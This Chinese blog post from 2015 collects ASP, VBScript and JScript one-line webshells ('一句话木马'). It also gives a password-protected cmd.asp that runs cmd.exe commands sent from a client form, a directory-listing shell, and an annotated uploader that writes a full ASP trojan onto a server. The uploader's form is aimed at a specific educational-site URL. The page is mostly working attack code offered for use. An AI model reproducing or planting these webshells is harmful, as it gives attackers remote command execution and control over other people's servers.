注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

一句话木马大全  

2015-01-09 21:17:29|  分类: 工具软件 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>"" Then Execute(Request("MH"))%>

<%if request ("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>

<SCRIPT language=VBScript runat="server">execute request("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["MH"],"unsafe");%>


1 asp一句话木马  
 一句话木马 服务器端 
带验证: 
——————————————cmd.asp———————————————— 
<% 
   if request("authkey")="pic16f873a" then 
%> 
       <textarea readonly cols=80 rows=25> 
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%> 
      </textarea> 
<% 
     end if 
%> 

带验证 客户端 
——————————————cmd.html———————————————— 
<HTML> 
<HEAD> 
<meta http-equiv="Content-Type" content="text/html; charset=gbk"> 
</HEAD> 
<div align=center> 
<FORM method=post name=frm target=_blank> 
Host:<input type=text name=act size=65 value="http://"> 
<br> 
<br>      
Cmd :<input type=text name=cmd size=65 value="cmd"> 
<br> 
<br>  
<input type=hidden name=authkey value="pic16f873a">    
<Input name=Send 
onclick="Javascipt:frm.action=document.frm.act.value; 
            frm.submit();" 
type=button value="Send Command"> 
</FORM> 
</div> 

  

目录浏览  

服务器端 
_________________________________________ 
<% 
if request("authkey")="pic16f873a" then 
szPara = Request.Form("path")  
set shell=server.createobject("shell.application")  
set dir1=shell.namespace(szPara) 
set diritems=dir1.items 

for each iii in diritems 
  response.write   iii.path & "<font color=blue>[" & iii.size &"]</font><br>" 
next 
end if 
%> 
_________________________________________ 
客户端 
__________________________________________ 
<HTML> 
<HEAD> 
<meta http-equiv="Content-Type" content="text/html; charset=gbk"> 
</HEAD> 
<div align=center> 
<FORM method=post name=frm target=_blank> 
Host:<input type=text name=act size=65 value="http://"> 
<br> 
<br> 
Path:<input type=text name=path size=65 value="C:\">  
<br> 
<br> 
<input type=hidden name=authkey value="pic16f873a">  
<Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();" 
type=button value="Send Command"> 

</FORM> 
</div> 
 
 
一句话木马客户端源文件:

里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了
***********************************************************

<form action=http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp method=post> 
//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单 以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理

<textarea name=value cols=120 rows=10 width=45> 
//这里的value值根据服务端<%execute request("value")%>中value而设定
//可以自行修改成<%execute request("p")%>相应这里的value值也必须改为p

set lP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法 
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应
lP.SaveToFile server.mappath("wei.asp"),2 
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面
</textarea>
//这段程序的功能:利用插入到数据库文件的<%execute request("value")%>这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木马的内容/textarea><BR><center><br>
//这段标签是你用来添加木马内容用的 

<input type=submit value=提交>
</form>

***********************************************************

//程序的主要框架是
<form>
<textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
<textarea></textarea>//添加木马内容用的
</form>
其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵
  评论这张
 
阅读(150)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017